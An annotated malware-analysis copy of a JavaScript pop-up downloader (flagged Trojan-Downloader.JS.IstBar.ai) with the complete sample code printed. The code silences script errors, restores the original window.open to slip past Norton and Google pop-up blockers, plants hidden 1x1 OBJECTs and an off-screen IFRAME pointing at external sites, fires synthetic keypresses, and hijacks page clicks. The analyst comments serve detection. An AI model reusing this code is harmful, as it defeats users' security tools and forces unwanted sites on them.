//detected: Trojan program Trojan-Downloader.JS.IstBar.ai URL: http://www.ffkan.com/js/newsp2.js
// Destination loaded into every window this script opens; it is the first
// argument of each window.open()/myWindow.open() call further down.
var paypopupURL = "http://www.m117.cn/?f";
// Initial value only: version() recomputes usingActiveX from the user-agent
// string when it is called at load time, before btpop() starts the pop-up flow.
var usingActiveX = true;
// Global error handler that reports every script error as handled (returns
// true), so failures in the probing code below never reach the browser's
// script-error UI.
function blockError()
{return true;}
// Installed immediately; this overwrites any window.onerror the host page set.
window.onerror = blockError;
//bypass norton internet security popup blocker
// If either of these globals exists, window.open is overwritten with it. The
// names look like the places where a pop-up blocker parked the browser's
// original window.open after wrapping it, so the assignment takes the wrapper
// out of the call path.
// NOTE(review): the page's own comment attributes this to Norton Internet
// Security; which product defines NS_ActualOpen is not stated here.
// Analyst note: a third-party script that touches these names is a strong
// triage signal for blocker evasion.
if (window.SymRealWinOpen) {
  window.open = SymRealWinOpen;
}
if (window.NS_ActualOpen) {
  window.open = NS_ActualOpen;
}

// Defaults for state the embedding page may have declared before this script.
// `var` is kept deliberately: the declarations are hoisted, so only names that
// are still undefined at this point receive a value (usingActiveX was already
// assigned at the top of the file).
if (typeof usingClick === 'undefined') {
  var usingClick = false;
}
if (typeof usingActiveX === 'undefined') {
  var usingActiveX = false;
}
if (typeof popwin === 'undefined') {
  var popwin = null;
}
if (typeof poped === 'undefined') {
  var poped = false;
}

// Shared state for the functions below.
var blk = 1;                     // gate AND-ed into usingClick/usingActiveX by version()
var setupClickSuccess = false;   // true once setupClick() has hooked document.onclick
var googleInUse = false;         // set by detectGoogle(); picks the createPopup() path in tryActiveX()
var myurl = location.href + '/'; // cut at the first '/' from index 8 on by openWindowBack()
var MAX_TRIED = 20;              // retry budget checked by tryActiveX() and openActiveX()
var activeXTried = false;        // true once the ActiveX route has finished or been abandoned
var tried = 0;                   // attempts counted against MAX_TRIED
var randkey = '0'; // random key from server
var myWindow;                    // window reference read from an embedded OBJECT's parentWindow
var popWindow;                   // object returned by window.createPopup()
var setupActiveXSuccess = 0;     // 0-5: failed setupActiveX() attempts, 6: setup completed
// bypass IE functions
// Plants the DOM scaffolding used by the ActiveX route. Does nothing unless
// usingActiveX is set.
//   1. a hidden INPUT "autoHit" whose ONKEYPRESS handler is showActiveX()
//   2. a window.createPopup() object holding a 1x1 OBJECT "getParentDiv"
//   3. an off-screen 1x1 IFRAME "popIframe" holding a 1x1 OBJECT "getParentFrame"
// Both OBJECTs are TYPE="text/html" and point at the same external URL.
// setupActiveXSuccess records progress: every exception increments it and
// schedules another attempt after 500 ms; 6 marks a completed setup.
// NOTE(review): the `== 5` branch in the catch looks unreachable. Once the
// counter is 5 the try body is skipped, so nothing can throw; the fallback to
// setupClick() is then reached through tryActiveX()'s retry budget instead.
// Analyst note: the hidden keypress target, the 1x1 text/html OBJECTs and the
// off-screen IFRAME are the distinctive page artefacts of this sample.
function setupActiveX() {
  if (!usingActiveX) {
    return;
  }
  try {
    if (setupActiveXSuccess < 5) {
      document.write('<DIV STYLE="display:none;"><INPUT ID="autoHit" TYPE="TEXT" ONKEYPRESS="showActiveX()"></DIV>');
      popWindow = window.createPopup();
      // error page
      popWindow.document.body.innerHTML = '<DIV ID="objectRemover"><OBJECT ID="getParentDiv" STYLE="position:absolute;top:0px;left:0px;" WIDTH=1 HEIGHT=1 DATA="http://www.resume-cn.com/firefox.htm" TYPE="text/html"></OBJECT></DIV>';
      document.write('<IFRAME NAME="popIframe" STYLE="position:absolute;top:-100px;left:0px;width:1px;height:1px;" src="/about:blank"></IFRAME>');
      // error page
      popIframe.document.write('<OBJECT ID="getParentFrame" STYLE="position:absolute;top:0px;left:0px;" WIDTH=1 HEIGHT=1 DATA="http://www.resume-cn.com/firefox.htm" TYPE="text/html"></OBJECT>');
      setupActiveXSuccess = 6;
    }
  } catch (e) {
    if (setupActiveXSuccess < 5) {
      setupActiveXSuccess += 1;
      // String form kept as in the original: it is evaluated in global scope.
      setTimeout('setupActiveX();', 500);
      return;
    }
    if (setupActiveXSuccess == 5) {
      activeXTried = true;
      setupClick();
    }
  }
}
// Tries to obtain a window reference (myWindow) through the parentWindow of one
// of the OBJECTs planted by setupActiveX(): the createPopup() copy when
// googleInUse is set, the IFRAME copy otherwise.
// While neither is ready it re-arms itself every 200 ms and counts the attempt;
// at MAX_TRIED the ActiveX route is abandoned and setupClick() takes over.
// No-op once activeXTried or poped is set.
function tryActiveX() {
  if (activeXTried || poped) {
    return;
  }

  if (setupActiveXSuccess == 6 && googleInUse && popWindow &&
      popWindow.document.getElementById('getParentDiv') &&
      popWindow.document.getElementById('getParentDiv').object &&
      popWindow.document.getElementById('getParentDiv').object.parentWindow) {
    myWindow = popWindow.document.getElementById('getParentDiv').object.parentWindow;
  } else if (setupActiveXSuccess == 6 && !googleInUse && popIframe &&
      popIframe.getParentFrame &&
      popIframe.getParentFrame.object &&
      popIframe.getParentFrame.object.parentWindow) {
    myWindow = popIframe.getParentFrame.object.parentWindow;
    // The frame is blanked as soon as the reference has been taken.
    popIframe.location.replace('about:blank');
  } else {
    setTimeout('tryActiveX()', 200);
    tried += 1;
    if (tried >= MAX_TRIED && !activeXTried) {
      activeXTried = true;
      setupClick();
    }
    return;
  }

  // openActiveX() runs before windowFired is set, so unless the flag was
  // already true its first pass only schedules a retry 100 ms later.
  openActiveX();
  window.windowFired = true;
  self.focus();
}
// Once myWindow exists and window.windowFired is set, fires a synthetic
// "onkeypress" on the hidden autoHit INPUT, whose handler is showActiveX().
// NOTE(review): presumably this is done so that the open() call in
// showActiveX() executes inside an input-event handler -- confirm against the
// targeted browser's pop-up blocker behaviour.
// Otherwise it polls itself every 100 ms. Every call, successful or not,
// counts against MAX_TRIED; when the budget is used up the ActiveX route is
// closed and setupClick() is installed.
// Analyst note: script-generated input events on an invisible element are a
// useful behavioural indicator for this kind of code.
function openActiveX() {
  if (activeXTried || poped) {
    return;
  }

  if (myWindow && window.windowFired) {
    window.windowFired = false;
    // The second argument is the value of the assignment expression (the
    // string that was stored in keyCode), not the event object itself.
    document.getElementById('autoHit').fireEvent("onkeypress", (document.createEventObject().keyCode = escape(randkey).substring(1)));
  } else {
    setTimeout('openActiveX();', 100);
  }

  tried += 1;
  if (tried >= MAX_TRIED) {
    activeXTried = true;
    setupClick();
  }
}
// ONKEYPRESS handler of the hidden autoHit INPUT (see setupActiveX()).
// Opens paypopupURL through myWindow.open(). When a window object comes back it
// is blurred and this window refocused, leaving the new window behind the
// page, and the flow is marked done (activeXTried, poped).
// When open() returns nothing:
//   - first failure: switch to the googleInUse path, reset the retry counter
//     and start tryActiveX() again;
//   - failure on the googleInUse path: give up and install the click hook.
// On the googleInUse path the first child of #objectRemover in the popup
// document is detached first, with a reference kept in window.daChildObject.
// No-op once activeXTried or poped is set.
function showActiveX() {
  if (activeXTried || poped) {
    return;
  }

  if (googleInUse) {
    window.daChildObject = popWindow.document.getElementById('objectRemover').children(0);
    window.daChildObject = popWindow.document.getElementById('objectRemover').removeChild(window.daChildObject);
  }

  // newWindow is an implicit global in the original and is left as one.
  newWindow = myWindow.open(paypopupURL, "abcdefg", "width=650,height=300,top=300,left=150,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,location=yes,status=yes");

  if (newWindow) {
    newWindow.blur();
    self.focus();
    activeXTried = true;
    poped = true;
    return;
  }

  if (googleInUse) {
    activeXTried = true;
    setupClick();
    return;
  }

  googleInUse = true;
  tried = 0;
  tryActiveX();
}
// end bypass IE functions
// normal call functions
// Direct route: when neither the click hook nor the ActiveX route is selected,
// calls window.open() straight away and records success in poped.
// If nothing has been opened by the end (blocked, or another route is
// selected), hands over to tryActiveX() or setupClick() depending on
// usingActiveX.
function paypopup() {
  if (!poped && !usingClick && !usingActiveX) {
    var features = "width=650,height=300,top=300,left=150,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,location=yes,status=yes";
    popwin = window.open(paypopupURL, "abcdefg", features);
    if (popwin) {
      poped = true;
    }
    self.focus();
  }

  if (poped) {
    return;
  }

  if (usingActiveX) {
    tryActiveX();
  } else {
    setupClick();
  }
}
// end normal call functions
// onclick call functions
// Fallback route: replaces document.onclick with gopop(), so the pop-up is
// requested from inside a click handler the next time the visitor clicks
// anywhere on the page.
// The page's previous handler is saved in the implicit global
// prePaypopOnclick, which gopop() calls afterwards.
// Runs at most once (setupClickSuccess) and not at all after a successful pop.
// Analyst note: a third-party script that reassigns document.onclick and then
// calls window.open from the new handler is the pattern to look for.
function setupClick() {
  if (poped || setupClickSuccess) {
    return;
  }
  // Legacy event-capture API, only called where window.Event exists.
  if (window.Event) {
    document.captureEvents(Event.CLICK);
  }
  prePaypopOnclick = document.onclick;
  document.onclick = gopop;
  self.focus();
  setupClickSuccess = true;
}
// document.onclick handler installed by setupClick().
// Until a window has been opened it calls window.open() on every click and
// records success in poped; after that it only forwards to the handler the
// page had before.
// The saved handler is invoked with no arguments and no receiver, so it does
// not get the event object the browser would have passed it.
function gopop() {
  if (!poped) {
    var features = "width=650,height=300,top=300,left=150,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,location=yes,status=yes";
    popwin = window.open(paypopupURL, "abcdefg", features);
    if (popwin) {
      poped = true;
    }
    self.focus();
  }

  if (typeof prePaypopOnclick === "function") {
    prePaypopOnclick();
  }
}
// end onclick call functions
// check version
// Probes for an installed COM control by writing a hidden OBJECT with a fixed
// CLASSID into the page, then ORs the outcome into googleInUse.
// NOTE(review): judging by the function name the CLSID belongs to a Google
// browser add-on, presumably the toolbar with its own pop-up blocker; confirm
// before relying on that attribution.
// NOTE(review): typeof null is also 'object', so the test is true whenever
// getElementById() returns without throwing, whether or not the control was
// instantiated. `|=` also turns googleInUse into a number (0 or 1).
// An exception schedules another probe after 50 ms. Skipped entirely unless
// usingActiveX is set.
function detectGoogle() {
  if (!usingActiveX) {
    return;
  }
  try {
    document.write('<DIV STYLE="display:none;"><OBJECT ID="detectGoogle" CLASSID="clsid:00EF2092-6AC5-47c0-BD25-CF2D5D657FEB" STYLE="display:none;" CODEBASE="view-source:about:blank"></OBJECT></DIV>');
    var probe = document.getElementById('detectGoogle');
    googleInUse |= (typeof probe == 'object');
  } catch (e) {
    setTimeout('detectGoogle();', 50);
  }
}
// Chooses the delivery route from substrings of navigator.userAgent:
//   usingClick   - "SV1", "Opera" or "Firefox" present
//   usingActiveX - "SV1" present, "Opera" absent, and "Microsoft" or "MSIE" present
// Both are AND-ed with the global gate blk. Ends by calling detectGoogle().
// "SV1" is the token Internet Explorer 6 sends on Windows XP SP2.
// os, bs and isframe are computed but never read or returned in this function.
function version() {
  var ua = window.navigator.userAgent;
  function has(token) {
    return ua.indexOf(token) != -1;
  }

  var isSV1 = has("SV1");
  var isOpera = has("Opera");
  var isFirefox = has("Firefox");
  var isMsie = has("Microsoft") || has("MSIE");

  var os = has('Win') ? 'W1' : 'W0';

  var bs = 'I0';
  if (isSV1) {
    bs = 'I2';
  } else if (!isOpera && !isFirefox && isMsie) {
    bs = 'I1';
  }

  // `this` is the global object when version() is called as a plain function
  // in non-strict code, which is how this file calls it.
  var isframe = top.location != this.location;

  paypopupURL = paypopupURL; // self-assignment, no effect; kept from the original
  usingClick = blk && (isSV1 || isOpera || isFirefox);
  usingActiveX = blk && isSV1 && !isOpera && isMsie;
  detectGoogle();
}
// Run the user-agent check at load time, so usingClick/usingActiveX hold their
// final values before btpop() (end of file) starts the pop-up flow.
version();
// end check version
// Dispatches to the route chosen by version(): ActiveX first, then the click
// hook, and the direct window.open() route when neither flag is set.
function loadingPop() {
  if (usingActiveX) {
    tryActiveX();
    return;
  }
  if (usingClick) {
    setupClick();
    return;
  }
  paypopup();
}
//\\\\\\\\\\\\\\
// Looks a cookie up by name in document.cookie.
//   name - cookie name, without the "=".
// Returns the unescaped value via getCookieVal(), or null when no cookie of
// that name is present.
// The scan compares "name=" only at offset 0 and right after each space, i.e.
// at the start of each "; "-separated pair, so a name that is merely a suffix
// of another cookie's name does not match.
function GetCookie (name) {
  var prefix = name + "=";
  var jar = document.cookie;
  var total = jar.length;
  var pos = 0;

  while (pos < total) {
    var valueStart = pos + prefix.length;
    if (jar.substring(pos, valueStart) == prefix) {
      return getCookieVal(valueStart);
    }
    // Jump to the character after the next space; indexOf() returning -1
    // makes this 0, which means there are no further pairs.
    pos = jar.indexOf(" ", pos) + 1;
    if (pos == 0) {
      break;
    }
  }
  return null;
}
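// Writes one cookie through document.cookie.
//   name, value - cookie name and value; the value is passed through escape().
//   Further optional positional arguments, read from `arguments`:
//     [2] expires - Date, serialised with toGMTString(); omitted or null
//                   gives a session cookie
//     [3] path    - appended verbatim when given
//     [4] domain  - appended verbatim when given
//     [5] secure  - appends "; secure" when == true
// The original read SetCookie.arguments, a deprecated Function property that
// throws a TypeError when the function is strict-mode code (for example inside
// an ES module). The local `arguments` object carries the same values and
// works in both modes.
// NOTE(review): name, path and domain are concatenated unescaped, so callers
// must not pass text containing ';' or line breaks.
function SetCookie (name, value)
{
var argv = arguments;
var argc = argv.length;
var expires = (argc > 2) ? argv[2] : null;
var path = (argc > 3) ? argv[3] : null;
var domain = (argc > 4) ? argv[4] : null;
var secure = (argc > 5) ? argv[5] : false;
document.cookie = name + "=" + escape (value) +
((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
((path == null) ? "" : ("; path=" + path)) +
((domain == null) ? "" : ("; domain=" + domain)) +
((secure == true) ? "; secure" : "");
}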
// Expires a cookie by rewriting it with the value 0 and an expiry date one
// millisecond in the past.
//   name - cookie name.
// No path or domain is sent, so only a cookie set with the default scope is
// affected.
function DeleteCookie (name) {
  var past = new Date(new Date().getTime() - 1);
  document.cookie = name + "=" + 0 + "; expires=" + past.toGMTString();
}
// Cookie lifetime; adjust to suit. (Translated from the original Chinese comment.)
// NOTE(review): despite the name, expDays is multiplied by 6 hours
// (6*60*60*1000 ms), so with expDays = 1 the expiry lies 6 hours after the
// script loads, not one day.
var expDays = 1;
// Global expiry Date passed by amt() to SetCookie(); DeleteCookie() declares
// its own local `exp` and does not touch this one.
var exp = new Date();
exp.setTime(exp.getTime() + (expDays*6*60*60*1000));
// Per-browser display counter kept in the cookie "countsports".
// Returns 1 on the first call (cookie absent) and the stored count plus one
// afterwards; btpop() only proceeds when the result is 1.
// The original comment says "show only once per IP"; the state actually lives
// in a cookie, so the limit applies per browser profile, not per address.
// First call: the cookie is written without an expiry (session cookie).
// Later calls: it is rewritten with the global `exp` expiry.
function amt() {
  var count = GetCookie('countsports');

  if (count == null) {
    SetCookie('countsports', '1');
    return 1;
  }

  var newcount = parseInt(count) + 1;
  if (newcount < 2) {
    count = 1; // no effect: count is not read again after this point
  }
  SetCookie('countsports', newcount, exp);
  return newcount;
}
// Returns the unescaped cookie value that starts at `offset` in
// document.cookie and runs up to the next ";" or, failing that, the end of
// the string.
//   offset - index of the first character of the value.
function getCookieVal(offset) {
  var jar = document.cookie;
  var stop = jar.indexOf(";", offset);
  var end = (stop == -1) ? jar.length : stop;
  return unescape(jar.substring(offset, end));
}
// Entry point of the flow: runs openWindowBack() only when amt() reports the
// first display (return value 1).
// It then tries to append the string "openWindowBack()" to aryADSeq, an array
// that is not defined in this file. If that push throws, for example because
// aryADSeq does not exist, openWindowBack() is called a second time.
function btpop() {
  if (amt() != 1) {
    return;
  }
  openWindowBack();
  try {
    aryADSeq.push("openWindowBack()");
  } catch (e) {
    openWindowBack();
  }
}
// Trims the global myurl to everything before the first "/" found at index 8
// or later (for an http:// URL, the scheme and host), falls back to "." when
// that leaves an empty string, then builds the ActiveX scaffolding and
// dispatches to the selected route.
// myurl is not read again by any function in this file.
function openWindowBack() {
  var cut = myurl.indexOf('/', 8);
  myurl = myurl.substring(0, cut);
  if (myurl === '') {
    myurl = '.';
  }
  setupActiveX();
  loadingPop();
}
// Executed as soon as the script has loaded; no user action is needed to
// start the flow.
btpop()
有时间分析一下
QQ:273352165
evlon#126.com
转载请注明出处。